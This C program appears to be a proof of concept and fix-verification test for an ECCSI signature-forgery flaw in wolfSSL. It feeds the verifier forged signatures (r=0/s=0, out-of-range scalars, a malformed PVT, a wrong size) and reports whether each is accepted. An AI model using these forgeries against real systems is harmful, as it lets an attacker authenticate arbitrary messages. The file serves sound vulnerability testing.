#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <wolfssl/options.h>
#include <wolfssl/wolfcrypt/eccsi.h>
#include <wolfssl/wolfcrypt/hash.h>
#include <wolfssl/wolfcrypt/random.h>

/* Byte length of one scalar (r, s) or one affine coordinate for the curve used here. */
#define CURVE_SIZE 32
/* Signature buffer size assumed by the forgery tests below, which treat it as
 * r (CURVE_SIZE bytes) || s (CURVE_SIZE bytes) || PVT (CURVE_SIZE * 2 + 1 bytes). */
#define SIG_SIZE (CURVE_SIZE * 4 + 1) /* 129 for P-256 */

/*
 * Print `label`, then `len` bytes of `data` as lowercase two-digit hex,
 * then a newline, all to stdout. `data` is not touched when len is 0.
 */
static void print_hex(const char* label, const byte* data, word32 len)
{
    const byte* cursor = data;
    word32 remaining = len;

    fputs(label, stdout);
    while (remaining-- > 0) {
        printf("%02x", (unsigned int)*cursor++);
    }
    putchar('\n');
}

/*
 * Overwrite the sz-byte field sig[offset .. offset+sz) with `val`, read as a
 * big-endian integer of val_len bytes:
 *   - shorter values are right-aligned (left-padded with zeros);
 *   - longer values keep only their least-significant sz bytes;
 *   - a NULL or empty `val` leaves the field all zeros.
 */
static void set_scalar(byte* sig, word32 offset, word32 sz, const byte* val, word32 val_len)
{
    byte* field = sig + offset;

    memset(field, 0, sz);
    if (val == NULL || val_len == 0) {
        return;
    }

    if (val_len > sz) {
        /* Too wide for the field: drop the high-order bytes. */
        memcpy(field, val + (val_len - sz), sz);
    } else {
        /* Fits: place at the low-order end so leading bytes stay zero. */
        memcpy(field + (sz - val_len), val, val_len);
    }
}

/*
 * out = in + 1, where both are big-endian unsigned integers of len bytes
 * (out may alias in: each byte is read before it is written).
 * Returns the carry out of the most significant byte: 1 when the addition
 * wrapped (in was all 0xFF, or len is 0), otherwise 0.
 */
static int add_one_to_bytes(byte* out, const byte* in, word32 len)
{
    int carry = 1;
    word32 pos = len;

    while (pos > 0) {
        --pos;
        const int total = (int)in[pos] + carry;
        carry = total >> 8;
        out[pos] = (byte)(total & 0xFF);
    }
    return carry; /* returns 1 if overflow */
}

/*
 * out = 2 * in, where both are big-endian unsigned integers of len bytes
 * (out may alias in). Returns the bit shifted out of the most significant
 * byte (0 or 1); a caller that needs the true value of 2 * in must account
 * for it, because `out` only holds 2 * in mod 2^(8 * len).
 */
static int double_bytes(byte* out, const byte* in, word32 len)
{
    int carry = 0;
    word32 pos = len;

    while (pos-- > 0) {
        /* in[pos] * 2 is even, so OR-ing in the incoming carry equals adding it. */
        const int shifted = ((int)in[pos] << 1) | carry;
        out[pos] = (byte)(shifted & 0xFF);
        carry = shifted >> 8;
    }
    return carry;
}

int main(int argc, char* argv[])
{
    int ret;
    int overall_bypass = 1; /* 0 if any variant passes on fixed version */
    EccsiKey kms_key, pub_key;
    WC_RNG rng;
    mp_int ssk;
    ecc_point* pvt = NULL;
    byte id[] = "test@wolfssl.com";
    word32 idSz = (word32)strlen((char*)id);
    byte msg[] = "FORGED: any text the attacker wants the victim to authenticate";
    word32 msgSz = (word32)sizeof(msg) - 1;
    byte sig[SIG_SIZE];
    word32 sigSz = sizeof(sig);
    byte hash[WC_MAX_DIGEST_SIZE];
    byte hashSz;
    int verified;
    byte q_bytes[CURVE_SIZE];

    printf("=== ECCSI Variant / Bypass Test ===\n");
    printf("Message: %s\n", msg);
    printf("Identity: %s\n", id);
    printf("\n");

    ret = wc_InitRng(&rng);
    if (ret != 0) { printf("wc_InitRng failed: %d\n", ret); return 1; }

    ret = wc_InitEccsiKey_ex(&kms_key, CURVE_SIZE, ECC_SECP256R1, NULL, INVALID_DEVID);
    if (ret != 0) { printf("wc_InitEccsiKey_ex failed: %d\n", ret); return 1; }

    ret = wc_MakeEccsiKey(&kms_key, &rng);
    if (ret != 0) { printf("wc_MakeEccsiKey failed: %d\n", ret); return 1; }

    ret = mp_init(&ssk);
    if (ret != 0) { printf("mp_init failed: %d\n", ret); return 1; }

    pvt = wc_ecc_new_point_h(NULL);
    if (pvt == NULL) { printf("wc_ecc_new_point_h failed\n"); return 1; }

    ret = wc_MakeEccsiPair(&kms_key, &rng, WC_HASH_TYPE_SHA256, id, idSz, &ssk, pvt);
    if (ret != 0) { printf("wc_MakeEccsiPair failed: %d\n", ret); return 1; }

    ret = wc_HashEccsiId(&kms_key, WC_HASH_TYPE_SHA256, id, idSz, pvt, hash, &hashSz);
    if (ret != 0) { printf("wc_HashEccsiId failed: %d\n", ret); return 1; }

    ret = wc_SetEccsiHash(&kms_key, hash, hashSz);
    if (ret != 0) { printf("wc_SetEccsiHash failed: %d\n", ret); return 1; }

    ret = wc_SetEccsiPair(&kms_key, &ssk, pvt);
    if (ret != 0) { printf("wc_SetEccsiPair failed: %d\n", ret); return 1; }

    ret = wc_SignEccsiHash(&kms_key, &rng, WC_HASH_TYPE_SHA256, msg, msgSz, sig, &sigSz);
    if (ret != 0) { printf("wc_SignEccsiHash failed: %d\n", ret); return 1; }
    printf("Real signature generated, size=%u\n", sigSz);

    ret = mp_to_unsigned_bin_len(&kms_key.params.order, q_bytes, CURVE_SIZE);
    if (ret != 0) { printf("mp_to_unsigned_bin_len failed: %d\n", ret); return 1; }
    print_hex("Curve order q: ", q_bytes, CURVE_SIZE);
    printf("\n");

    ret = wc_InitEccsiKey_ex(&pub_key, CURVE_SIZE, ECC_SECP256R1, NULL, INVALID_DEVID);
    if (ret != 0) { printf("wc_InitEccsiKey_ex (pub) failed: %d\n", ret); return 1; }

    byte pubData[CURVE_SIZE * 2 + 1];
    word32 pubSz = sizeof(pubData);
    ret = wc_ExportEccsiPublicKey(&kms_key, pubData, &pubSz, 1);
    if (ret != 0) { printf("wc_ExportEccsiPublicKey failed: %d\n", ret); return 1; }
    ret = wc_ImportEccsiPublicKey(&pub_key, pubData, pubSz, 1);
    if (ret != 0) { printf("wc_ImportEccsiPublicKey failed: %d\n", ret); return 1; }
    ret = wc_SetEccsiHash(&pub_key, hash, hashSz);
    if (ret != 0) { printf("wc_SetEccsiHash (pub) failed: %d\n", ret); return 1; }

    /* Precompute some values */
    byte q_plus_one[CURVE_SIZE];
    byte q_minus_one[CURVE_SIZE];
    byte two_q[CURVE_SIZE];
    byte one[CURVE_SIZE];
    byte zero[CURVE_SIZE];
    memset(zero, 0, CURVE_SIZE);
    memset(one, 0, CURVE_SIZE); one[CURVE_SIZE-1] = 1;
    memcpy(q_plus_one, q_bytes, CURVE_SIZE);
    add_one_to_bytes(q_plus_one, q_bytes, CURVE_SIZE);
    memcpy(q_minus_one, q_bytes, CURVE_SIZE);
    /* q_minus_one = q - 1 */
    for (int i = (int)CURVE_SIZE - 1; i >= 0; i--) {
        int borrow = 0;
        if (i == (int)CURVE_SIZE - 1) {
            borrow = (q_bytes[i] < 1);
            q_minus_one[i] = q_bytes[i] - 1;
        } else {
            int sub = q_bytes[i] - borrow;
            if (sub < 0) { sub += 256; borrow = 1; }
            else { borrow = 0; }
            q_minus_one[i] = (byte)sub;
        }
    }
    double_bytes(two_q, q_bytes, CURVE_SIZE);

    struct {
        const char* name;
        const byte* r_val;
        const byte* s_val;
        int expect_vuln_accept;
        int expect_fixed_accept;
    } tests[] = {
        /* 1. Original exploit */
        {"r=0, s=0 (original)", zero, zero, 1, 0},
        /* 2. Upper boundary: exactly order */
        {"r=order, s=order", q_bytes, q_bytes, 0, 0},
        /* 3. Above upper boundary: order+1 */
        {"r=order+1, s=order+1", q_plus_one, q_plus_one, 0, 0},
        /* 4. Double order */
        {"r=2q, s=2q", two_q, two_q, 0, 0},
        /* 5. r=0 with valid s (tests r-check alone) */
        {"r=0, s=order-1", zero, q_minus_one, 0, 0},
        /* 6. s=0 with valid r (tests s-check alone) */
        {"r=1, s=0", one, zero, 0, 0},
        /* 7. Valid scalars, random signature (sanity) */
        {"r=order-1, s=order-1", q_minus_one, q_minus_one, 0, 0},
    };
    int num_tests = sizeof(tests) / sizeof(tests[0]);

    printf("--- Variant / Bypass Attempts ---\n");
    for (int i = 0; i < num_tests; i++) {
        byte forged[SIG_SIZE];
        memcpy(forged, sig, SIG_SIZE);
        set_scalar(forged, 0, CURVE_SIZE, tests[i].r_val, CURVE_SIZE);
        set_scalar(forged, CURVE_SIZE, CURVE_SIZE, tests[i].s_val, CURVE_SIZE);

        printf("\nTest %d: %s\n", i + 1, tests[i].name);
        print_hex("  Forged r: ", forged, CURVE_SIZE);
        print_hex("  Forged s: ", forged + CURVE_SIZE, CURVE_SIZE);

        verified = 0;
        ret = wc_VerifyEccsiHash(&pub_key, WC_HASH_TYPE_SHA256, msg, msgSz,
                                 forged, SIG_SIZE, &verified);
        printf("  wc_VerifyEccsiHash ret=%d, verified=%d\n", ret, verified);

        if (ret == 0 && verified) {
            printf("  *** FORGERY ACCEPTED ***\n");
            if (tests[i].expect_fixed_accept == 0) {
                printf("  WARNING: Unexpected acceptance on fixed version!\n");
                overall_bypass = 0;
            }
        } else {
            printf("  Forgery rejected (ret=%d, verified=%d)\n", ret, verified);
        }
    }

    /* 8. Test with wrong sigSz to check parser robustness */
    {
        byte forged[SIG_SIZE];
        memcpy(forged, sig, SIG_SIZE);
        memset(forged, 0, CURVE_SIZE * 2); /* r=0, s=0 */
        printf("\nTest %d: r=0, s=0 with wrong sigSz (SIG_SIZE-1)\n", num_tests + 1);
        verified = 0;
        ret = wc_VerifyEccsiHash(&pub_key, WC_HASH_TYPE_SHA256, msg, msgSz,
                                 forged, SIG_SIZE - 1, &verified);
        printf("  wc_VerifyEccsiHash ret=%d, verified=%d\n", ret, verified);
        if (ret == 0 && verified) {
            printf("  *** FORGERY ACCEPTED (BYPASS via size) ***\n");
            overall_bypass = 0;
        } else {
            printf("  Rejected as expected (ret=%d, verified=%d)\n", ret, verified);
        }
    }

    /* 9. Test with r=0, s=0 but PVT is infinity point (malformed) */
    {
        byte forged[SIG_SIZE];
        memcpy(forged, sig, SIG_SIZE);
        memset(forged, 0, CURVE_SIZE * 2); /* r=0, s=0 */
        /* Overwrite PVT with all zeros (infinity point encoding attempt) */
        memset(forged + CURVE_SIZE * 2, 0, CURVE_SIZE * 2 + 1);
        printf("\nTest %d: r=0, s=0 with PVT set to infinity encoding\n", num_tests + 2);
        verified = 0;
        ret = wc_VerifyEccsiHash(&pub_key, WC_HASH_TYPE_SHA256, msg, msgSz,
                                 forged, SIG_SIZE, &verified);
        printf("  wc_VerifyEccsiHash ret=%d, verified=%d\n", ret, verified);
        if (ret == 0 && verified) {
            printf("  *** FORGERY ACCEPTED (BYPASS via PVT) ***\n");
            overall_bypass = 0;
        } else {
            printf("  Rejected as expected (ret=%d, verified=%d)\n", ret, verified);
        }
    }

    /* 10. Test with a different message (same as original repro) */
    {
        byte msg2[] = "Completely different message";
        word32 msg2Sz = (word32)sizeof(msg2) - 1;
        byte forged[SIG_SIZE];
        memcpy(forged, sig, SIG_SIZE);
        memset(forged, 0, CURVE_SIZE * 2);
        printf("\nTest %d: r=0, s=0 with DIFFERENT message\n", num_tests + 3);
        verified = 0;
        ret = wc_VerifyEccsiHash(&pub_key, WC_HASH_TYPE_SHA256, msg2, msg2Sz,
                                 forged, SIG_SIZE, &verified);
        printf("  wc_VerifyEccsiHash ret=%d, verified=%d\n", ret, verified);
        if (ret == 0 && verified) {
            printf("  *** FORGERY ACCEPTED ***\n");
            overall_bypass = 0;
        } else {
            printf("  Rejected as expected (ret=%d, verified=%d)\n", ret, verified);
        }
    }

    wc_ecc_del_point_h(pvt, NULL);
    mp_clear(&ssk);
    wc_FreeEccsiKey(&kms_key);
    wc_FreeEccsiKey(&pub_key);
    wc_FreeRng(&rng);

    printf("\n=== Overall bypass verdict: %s ===\n",
           overall_bypass == 0 ? "BYPASS CONFIRMED" : "NO BYPASS");

    return overall_bypass; /* 0 = bypass found, 1 = no bypass */
}
